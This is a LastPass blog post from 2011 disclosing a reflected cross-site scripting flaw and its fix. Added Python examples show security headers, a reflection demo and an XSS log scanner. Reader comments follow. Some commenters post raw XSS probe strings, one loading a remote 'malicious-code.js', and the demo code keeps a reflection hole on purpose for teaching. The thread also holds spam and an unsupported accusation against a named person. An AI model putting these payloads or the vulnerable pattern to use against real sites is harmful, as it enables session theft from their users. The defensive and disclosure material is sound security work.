Feb 27, 2011

Cross Site Scripting vulnerability reported, fixed

While no client data was impacted, we were notified at ~3pm Eastern time yesterday of a non-persistent cross site scripting vulnerability on the LastPass.com website. By 5:30pm it was fixed, tested and deployed, closing the hole. It's important to note that this was not a flaw in the extensions, and it could only have been exploited if you visited a malicious site that was set up to exploit this flaw while you were logged into LastPass.

The cause of this issue lay in our testing procedure for this particular case, which has been rectified. Our logs show no sign of this being successfully exploited (beyond the person who found it). We've made a number of changes to improve security on the LastPass.com website and reduce the chance of a recurrence of this kind of issue:

1) Implemented HSTS (http://en.wikipedia.org/wiki/HTTP_Strict_Transport_Security). This ensures that browsers which support it (Chrome and Firefox 4) stay on secure SSL requests for the lastpass.com domain.

2) Increased our input filtering and stateful inspection.

3) We've implemented X-Frame-Options (https://developer.mozilla.org/en/the_x-frame-options_response_header), which makes an attack like this harder to exploit: our pages can no longer be embedded in another page via an iframe/frame.

4) We've begun implementing something very similar to Content Security Policy (CSP) (https://wiki.mozilla.org/Security/CSP/Specification). Because LastPass is a browser extension, we can implement this today and roll it out far more quickly than the browsers themselves will support it.
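As an added illustration of items 1, 3 and 4 (example code, not LastPass's own implementation), the following Python WSGI middleware attaches the three response headers, and an audit helper reports which of them are missing or weak on a given response. The header values, the one-month HSTS floor, the "weak" comparison configuration and the toy app are all assumptions made for the example.

```python
import re

# Added example (not LastPass's code). Header values below are assumptions
# chosen to illustrate the three mitigations listed in the post.
HARDENING_HEADERS = {
    "Strict-Transport-Security": "max-age=31536000; includeSubDomains",
    "X-Frame-Options": "DENY",
    "Content-Security-Policy": "default-src 'self'; script-src 'self'; object-src 'none'",
}

# Constructed "weak" configuration for comparison: short HSTS lifetime,
# permissive framing, and a CSP that still allows inline script.
WEAK_HEADERS = {
    "Strict-Transport-Security": "max-age=60",
    "X-Frame-Options": "ALLOWALL",
    "Content-Security-Policy": "default-src *; script-src 'self' 'unsafe-inline'",
}

MIN_HSTS_AGE = 30 * 86400  # assumption: treat anything under a month as weak


def harden(app):
    """Wrap a WSGI app so every response carries the hardening headers.
    A header the app already set is left alone."""
    def wrapped(environ, start_response):
        def start(status, headers, exc_info=None):
            present = {name.lower() for name, _ in headers}
            extra = [(n, v) for n, v in HARDENING_HEADERS.items()
                     if n.lower() not in present]
            return start_response(status, headers + extra, exc_info)
        return app(environ, start)
    return wrapped


def hello_app(environ, start_response):
    """Toy app that sets no security headers of its own."""
    start_response("200 OK", [("Content-Type", "text/html; charset=utf-8")])
    return [b"<html><body>hello</body></html>"]


def response_headers(app, path="/"):
    """Run one request through a WSGI app offline; return its headers as a dict."""
    captured = {}

    def start_response(status, headers, exc_info=None):
        captured.update(headers)
        return lambda data: None

    environ = {"REQUEST_METHOD": "GET", "PATH_INFO": path,
               "wsgi.url_scheme": "https", "SERVER_NAME": "localhost"}
    b"".join(app(environ, start_response))  # drain the body
    return captured


def audit_headers(headers):
    """Return findings for a response-header dict (names compared case-insensitively).
    An empty list means all three headers are present and not obviously weak."""
    h = {k.lower(): v for k, v in headers.items()}
    findings = []

    hsts = h.get("strict-transport-security")
    age = re.search(r"max-age=(\d+)", hsts or "")
    if hsts is None:
        findings.append("HSTS missing")
    elif not age or int(age.group(1)) < MIN_HSTS_AGE:
        findings.append("HSTS max-age too short")

    if h.get("x-frame-options", "").upper() not in ("DENY", "SAMEORIGIN"):
        findings.append("X-Frame-Options missing or permissive")

    csp = h.get("content-security-policy")
    if csp is None:
        findings.append("CSP missing")
    else:
        directives = {}
        for directive in csp.split(";"):
            parts = directive.split()
            if parts:
                directives[parts[0]] = parts[1:]
        # script-src falls back to default-src when it is absent
        script_src = directives.get("script-src", directives.get("default-src", []))
        if "'unsafe-inline'" in script_src or "*" in script_src:
            findings.append("CSP allows inline or wildcard script sources")
    return findings


if __name__ == "__main__":
    print("unwrapped app:", audit_headers(response_headers(hello_app)))
    print("hardened app: ", audit_headers(response_headers(harden(hello_app))))
    print("weak config:  ", audit_headers(WEAK_HEADERS))
```

The audit deliberately only checks for the obviously weak cases (no header, a short max-age, framing allowed, inline or wildcard script sources); a real review would also look at the remaining CSP directives and at whether the headers are sent on every response, including error pages and redirects.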

We believe this issue to be resolved but are continuing to audit and implement ways to further mitigate risk. If you would like to take extra precautions in the interim, a good security practice is to avoid staying logged into LastPass while visiting websites of ill repute.

CSP is a big step forward in reducing the risk from this kind of attack. While we're disappointed we missed this case up front, we're pleased that it will lead to an even stronger product in the near term.

For those wanting to learn more about non-persistent cross-site scripting (XSS), you can read about it here: http://en.wikipedia.org/wiki/Cross-site_scripting
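To make the "non-persistent" part concrete, here is an added example (not LastPass code, and not the page that was actually affected): a constructed search page that echoes a query parameter back with and without output encoding, plus a scan over constructed access-log lines of the kind a defender reviews when checking, as the post says LastPass did, whether such a flaw was ever used against the site. The page template, the parameter name and the log lines are assumptions.

```python
import html
import re
from urllib.parse import parse_qs, unquote_plus

# Added example (not LastPass's code). Assumed: a search page that reflects
# the "q" parameter back into its HTML.
TEMPLATE = "<p>Results for: {}</p>"


def query_param(query_string, name="q"):
    """Pull one parameter out of a raw query string (percent-decoding applied)."""
    return parse_qs(query_string, keep_blank_values=True).get(name, [""])[0]


def render_vulnerable(query_string):
    """Echoes the parameter straight into HTML: a non-persistent (reflected) XSS,
    because whatever markup the link carried becomes part of the page."""
    return TEMPLATE.format(query_param(query_string))


def render_safe(query_string):
    """Same page with output encoding: '<', '>', '&' and quotes become entities,
    so the parameter can only ever be text."""
    return TEMPLATE.format(html.escape(query_param(query_string), quote=True))


TAG_RE = re.compile(r"</?[A-Za-z][^>]*>")


def reflects_markup(page, template=TEMPLATE):
    """True if the rendered page contains a tag the template itself does not."""
    expected = set(TAG_RE.findall(template.format("")))
    return bool(set(TAG_RE.findall(page)) - expected)


# Detection side: flag requests whose decoded target carries script markup.
PROBE_RE = re.compile(r"<\s*script|javascript:|\bon\w+\s*=", re.IGNORECASE)
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def suspicious_requests(access_log_lines):
    """Return the log lines whose request target, once URL-decoded, matches PROBE_RE."""
    hits = []
    for line in access_log_lines:
        m = REQUEST_RE.search(line)
        if m and PROBE_RE.search(unquote_plus(m.group(1))):
            hits.append(line)
    return hits


# Constructed sample log lines in common access-log format (not LastPass's logs).
SAMPLE_LOG = [
    '10.0.0.5 - - [27/Feb/2011:14:58:01 -0500] "GET /search?q=vault HTTP/1.1" 200 512',
    '10.0.0.9 - - [27/Feb/2011:15:01:22 -0500] "GET /search?q=%3cscript%3ealert(1)%3c/script%3e HTTP/1.1" 200 640',
    '10.0.0.9 - - [27/Feb/2011:15:01:40 -0500] "GET /search?q=%3cimg+src%3dx+onerror%3dalert(1)%3e HTTP/1.1" 200 631',
]

if __name__ == "__main__":
    qs = "q=%3Cb%3Ehi%3C%2Fb%3E"
    print("vulnerable:", render_vulnerable(qs), reflects_markup(render_vulnerable(qs)))
    print("safe:      ", render_safe(qs), reflects_markup(render_safe(qs)))
    for line in suspicious_requests(SAMPLE_LOG):
        print("probe:", line)
```

The log scan decodes the request target before matching, which is the step that matters: the encoded forms in a raw log look nothing like markup, and a filter that only looks at the literal bytes misses them. A real log review would also account for double encoding and for parameters carried in POST bodies, which an access log does not record.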

Our thanks to Mike Cardwell for responsibly reporting this issue.

LastPass

47 comments:

  1. "Implemented HSTS: http://en.wikipedia.org/wiki/HTTP_Strict_Transport_Security This will ensure browsers that support it (Chrome and Firefox 4) will be forced to stay on secure SSL web requests for the lastpass.com domain."

    So what about IE?

  2. @Anonymous Good point. If you're using IE8 or above it includes an XSS (cross site scripting) filter, and was likely immune to this attack:

    http://msdn.microsoft.com/en-us/library/dd565647(v=vs.85).aspx

  3. I think this has always been one of my hesitations in fully utilizing LastPass - e.g. the fact that user data can be accessed via the website login. For what it's worth, I think LastPass would've been much wiser to exclude this and only have LastPass as a browser extension. There is no need to have LastPass via the website that I can think of. I mean, there's all the browser extensions, the mobile apps, the USB apps, the pocket app....so to me, it's just opening up the service to a possible flaw, which in this case, has come true. While I applaud LastPass for being open and transparent, I think they are holding themselves back with some of the decisions they make with regard to the service. Many people in my tech circles have expressed nervousness at having their data seemingly so easily accessible via the site login and therefore they aren't using the service.

  4. I wrote a comment and it appears to have magically disappeared after I saw it for 60 seconds. Are you censoring comments, LastPass? If so, this is a shame.

  5. I'm very impressed with the transparency and speed with which you've responded to this issue. Kudos to LastPass, and also to Mike Cardwell for reporting this issue so that it could be resolved before going public.

    Obviously LastPass's business depends on the trust of its users. While ideally this should never have happened, you have responded in such a way that it is the next best thing.

  6. FYI, the original article talking about this vulnerability is here:

    https://grepular.com/LastPass_Vulnerability_Exposes_Account_Details

  7. I agree with Nick. While not a really serious vulnerability that would've exposed our passwords, ideally you don't want this thing to happen. But the quick response and this blog post explaining what has been done to protect users against this in the future is a good way (at least for me) to keep trusting LastPass. Openness is the way to go in these situations, and you guys handled it pretty well.

  8. Thanks for the quick response and dealing with the problem in a proper way.

  9. @Anonymous (filtering question) -- we're not filtering (except for spam), please feel free to repost.

  10. Pride before a fall. The arrogance repeatedly displayed by Lastpass virtually assured failure. Very likely it will happen again only on a more massive scale.

    You were advised you had a problem and now brag how quickly you responded.

    You do realize anyone who truly plans to exploit your allegedly secure system will not bother to inform you and will instead let you blithely go on blowing your own horn.

    Why don't you place a million dollars in escrow assuring no one can blow down your house of cards and we'll see how fast it falls?

  11. @Anonymous (Pride):

    They don't seem to be bragging here, and they even stated their own disappointment in their performance. What more do you want? Nobody is perfect; even if they'll never get there, at least they are reaching for that goal.

    You do realize that that is the case (it will fail, given enough effort) with anything having anything to do with security, right? If you have such little confidence, you shouldn't trust them with your data...it's as simple as that.

  12. What does "logged into LastPass" mean? Having entered your credentials on the LP website in the browser? Or for the extension as well?

  13. I have the same question. What does logged into LastPass mean? Do I need to take the same precautions when I am using the extensions on Chrome / FF or just when logged into LP website?

  14. This exploit was performed several months ago by Ari Silverstein on alt.privacy.* (Ari is known to be ex-CIA NOC IT technician Frank Camper). Nothing new here but apparently this was overlooked by LastPass.

  15. Thanks for the transparency and quick response. It's all about trust, and this kind of reaction is reassuring. Keep up the good work.

  16. I don't understand why everyone is making such a big deal about HSTS. HSTS is just a method by which the application server suggests to the web client that a best effort should be made to use HTTPS. There are more reliable ways to force and require HTTPS connections from the application layer. Are there actual use cases in which a lastpass client would even fail back to an HTTP connection? Do the lastpass application servers even accept secure data over non-secure connections?

  17. @MrVJTod The big deal is for 2 potential reasons from LastPass' point of view:

    1) We can make a very long expiration (we haven't yet but are about to). Once we do if you're using public WIFI, and just type 'lastpass.com', before HSTS you could have DNS spoofed, have that request intercepted and be sent to 'https://lastpasss.com' never being the wiser.

    2) A preload list is out there and we're attempting to be put on it -- once that happens every browser that supports it will automatically know that if you type 'lastpass.com' you mean 'https://lastpass.com'

    You're right that many of the application requests are limited anyway to SSL (our main session cookie is 'secure' so it can't be used for any http request). This is mostly for the 'before you get to https://LastPass.com' part...

  18. @MrVJTod I also forgot to mention not allowing users to accept SSL errors; potentially saving a user from themselves.

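    The browser-side behaviour Joe describes in the two comments above, as an added example that is not part of the original post and not any real browser's code: a small model of an HSTS cache that upgrades navigations for hosts it has seen a policy from (or that are preloaded), expires policies by max-age, honours includeSubDomains, and refuses a certificate-error bypass for known hosts. The hostnames, header values and timings are constructed for the example.

```python
import re
import time
from urllib.parse import urlsplit, urlunsplit


class HstsStore:
    """Minimal model of a browser's HSTS cache (added example, not real browser code).
    `preload` plays the role of the built-in preload list; `now` is injectable
    so that expiry can be exercised without waiting."""

    def __init__(self, preload=(), now=time.time):
        self.now = now
        self.policies = {}  # host -> (expires_at, include_subdomains)
        for host in preload:
            self.policies[host] = (float("inf"), True)

    def observe(self, host, header_value):
        """Record a Strict-Transport-Security header received over HTTPS.
        A real browser ignores the header when it arrives over plain HTTP."""
        m = re.search(r"max-age=(\d+)", header_value)
        if not m:
            return
        max_age = int(m.group(1))
        if max_age == 0:
            self.policies.pop(host, None)  # max-age=0 revokes the policy
            return
        include_sub = re.search(r"includeSubDomains", header_value, re.I) is not None
        self.policies[host] = (self.now() + max_age, include_sub)

    def is_known(self, host):
        """True if `host` or a parent domain (with includeSubDomains) has a live policy."""
        parts = host.split(".")
        for i in range(len(parts)):
            policy = self.policies.get(".".join(parts[i:]))
            if policy is None:
                continue
            expires, include_sub = policy
            if expires < self.now():
                continue  # stale entry
            if i == 0 or include_sub:
                return True
        return False

    def navigate(self, url):
        """Return the URL the browser actually fetches: http is rewritten to https
        for known hosts. For an unknown host the first request goes out as typed,
        which is the gap a preload entry closes."""
        p = urlsplit(url)
        if p.scheme == "http" and self.is_known(p.hostname):
            return urlunsplit(("https", p.netloc, p.path, p.query, p.fragment))
        return url

    def allow_cert_error_bypass(self, host):
        """A known HSTS host gets a hard failure on a certificate error; the user
        is not offered a click-through."""
        return not self.is_known(host)


if __name__ == "__main__":
    store = HstsStore()
    print("first visit:", store.navigate("http://lastpass.com/"))
    store.observe("lastpass.com", "max-age=31536000; includeSubDomains")
    print("after policy:", store.navigate("http://lastpass.com/login"))
    print("subdomain:", store.navigate("http://www.lastpass.com/"))
    print("cert-error bypass allowed:", store.allow_cert_error_bypass("lastpass.com"))
    preloaded = HstsStore(preload=["lastpass.com"])
    print("preloaded first visit:", preloaded.navigate("http://lastpass.com/"))
```

    The first `navigate` call shows the window Joe is describing: until the browser has seen the header once over HTTPS, a typed `lastpass.com` goes out as plain HTTP and an on-path attacker can answer it. A long max-age keeps that window from reopening, and a preload entry removes it entirely.
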
  19. Good Job Mike and Lastpass

  20. It's good that no client data have been affected.

  21. @Joe

    I'd still like to hear from you about Mike Cardwell's statement where he indicated that users LP site credentials can likely be compromised through future javascript exploits. I'm seriously considering going back to offline password management. What do you say?

  22. I still have not seen the explanation of what being "logged out" means. Whether it is just from the program or from the extensions as well.

  23. @Anonymous (Logged Out) - Logged out means from the website/extension. If you logout from the extension it logs out of both, if you logout from the website it should also log you out of both.

  24. @Anonymous (offline) -- We've done a fair amount since Mike made that statement. We certainly have lived in fear of a 'persistent' cross site scripting attack -- one where both your encryption key and the XSS code are in the same place at the same time.

    This is a very real threat (but not the same one that occurred above). A very strong response to this potential threat is the proper use of Content Security Policy (CSP) or something like it if it's not available. This is why I'm so focused on that piece right now -- even this persistent XSS case would be very much mitigated by CSP preventing data that could be gathered by a persistent XSS from leaving the page. I did a post today on us going live with CSP if you utilize Firefox 4.

    Frankly an XSS shouldn't happen; but it did and we're embarrassed that it did. Mike's right that we should have assumed that it would happen and have another protection layer -- that layer is CSP.

  25. @Anonymous (Deleting comments) -- I visited the comment spam section of blogger today and found your comment and it has been restored. We're not trying to filter, but we're clearly not checking the automated spam filters much either.

  26. Why not make it an option to disable login through the website and only make LastPass functionality available through the plugin/app?

  27. Joe - thanks for these answers - and even thanks for replying to those that for some reason feel they must remain anon...

    Great product and response to the issues...

  28. is there a way where my data remains off LastPass servers? i have always been leery of any password security site that has my data and someone therefore can de-encrypt it/un-encrypt/break?
    i prefer to have my data only on my machine in an encrypted mode. would this exploit have been possible with the gizmo that LastPass sold? A usb plug in that was supposed to be the super secure method?
    i also don't remember reading that LastPass was a yearly subscription fee rate, i thought it was like roboform, pay for it once, like i did with roboform and have used it through upgrades for probably at least 7 years or longer. I do have issues with roboform's security, since they do not encrypt the sites you have saved, that has made me change to LastPass. But for a yearly fee, i can encrypt my roboform file with true crypt and place it in pictures in dropbox, that will solve that, including robotogo, since "RF" support said it was not possible to encrypt/hide the user sites and i realize they were open to anyone who uses my machine. If someone knows you have an account at certain banks/financial institution, that is the first step to the crack.
    posting as anonymous in a forum like this is smarter than letting people know to look in your pictures for a true crypt file, not that i know good security chops set up yet. i need to learn how to set up a Proxy as a start.
    better than the people in my apartment building, here they installed a creditcard/debit card only payment method for a laundry card. might as well email russianmafia.com your cc number.

  29. Congratulations to the LP team for their honest attribute, not only in this current situation, but in general (they answer technical questions openly, communicate with the users providing clear answers that do not underestimate our intelligence, instead of hiding behind marketing speech, etc).

    Trying to implement a secure service of this kind over platforms/technologies that are so inherently hard to control/predict/secure, while maintaining the experience that users relatively unfamiliar with computers expect, is a constant struggle.

    Even though normally I wouldn't consider using/paying for a service of this kind, exactly because I understand those difficulties (privacy of associated URLs is important to me), after having been browsing the forum for the past hour and seeing the staff's responses there, I'm convinced to give it a try for non-critical stuff.

    Keep it up!

  30. PS.

    "(privacy of associated URLs is important to me)"

    not really related to the previous point, so I shouldn't have put it there. This is really a separate point that I had in my mind and popped up at the wrong place: Apart from passwords, I also care for the privacy of other information that is not directly sensitive, needs to be more available, and thus is not protected so much, most notably the URLs. I definitely wouldn't like someone fetching a list of the locations to which I maintain accounts.

    Sorry for the long posts, again thanks for the direct communication LP team.

  31. is there a way where my data remains off LastPass servers? i have always been leery of any password security site that has my data and someone therefore can de-encrypt it. i realize that the data is encrypted, but if someone traps my master PW, they have everything. It could be a rogue employee with a hefty payoff and a one way ticket.
    i prefer to have my data only on my machine in an encrypted mode. would this exploit have been possible with the gizmo that LastPass sold with the pro version? the usb plug in that was supposed to be the super secure method?
    i also don't remember reading that LastPass pro was a yearly subscription rate, i thought it was like roboform, pay for it once, like i did with roboform and have used it through upgrades for probably at least 7 years or longer. I do have issues with roboform's security, since they do not encrypt the sites you have saved, that has made me change to LastPass. i guess i could encrypt my roboform file with true crypt and solve that, including robotogo, since they "RF" said it was not possible to encrypt/hide the user sites and they were open to anyone who used your machine. if someone knows you have an account at certain banks/financial institution, that is the first step to the crack.
    with roboform i always logged into my sites via robo log in feature, since it was faster and easier. over the years i noticed that if a site that i had used before was not working with roboform, alarm bells were going off to be careful.
    i am not sure if using an official LastPass bookmark would prevent this type of vulnerability.
    i also noticed my earlier post is missing.

  32. I still love my LastPass! Thanks for putting out such a great product and staying on top of potential security issues. There are certain passwords I have been reluctant to enter into LastPass such as banking, but for all my other stuff I'm glad to have you there.

  33. Always good to be pro-active good job!

  34. That's right Sam, otherwise, this vulnerability could expose users to risk.

  35. <% String eid = request.getParameter("eid"); %>

  36. hi<%3cscript>alert('hello')

  37. %3cscript%3e alert(''hello')%3c/script%3e

  38. %3cscript src=http://www.example.com/malicious-code.js%3e%3c/script%3e

  39. We need to be very cautious. If XSS attacks, it may not only destroy our websites, it can take down our company as well.

  40. Non-persistent cross site scripting vulnerability could cause a site to go down or worse, you can get the website hacked and could cause severe damages.

    web design norwich

  41. You belong to the 0.1% of website owners who take these corrective actions to protect against the risks that potential XSS attacks could pose to the security and privacy of your products and their userbase. Congrats LastPass staff ;)

  42. "Implemented HSTS: http://en.wikipedia.org/wiki/HTTP_Strict_Transport_Security This will ensure browsers that support it (Chrome and Firefox 4) will be forced to stay on secure SSL web requests for the lastpass.com domain."

    So what about IE?

    I would also like to know about IE as that is all I use.

  43. Love my Last Pass program... slowly moved over from 1Password, I just like LastPass better :-)
    Macbook Pro & iPhone
    Andy :-)

  44. bigg boss 8 is one of the most controversial TV reality show on their own Indian TV, presented by Colors TV. The reality show is produced under the production house of Endemol Production House.

  45. I just want to let you know that I just check out your site and I find it very interesting and informative. I can't wait to read lots of your posts
    labor day 2014 sales
    labor day sales 2014
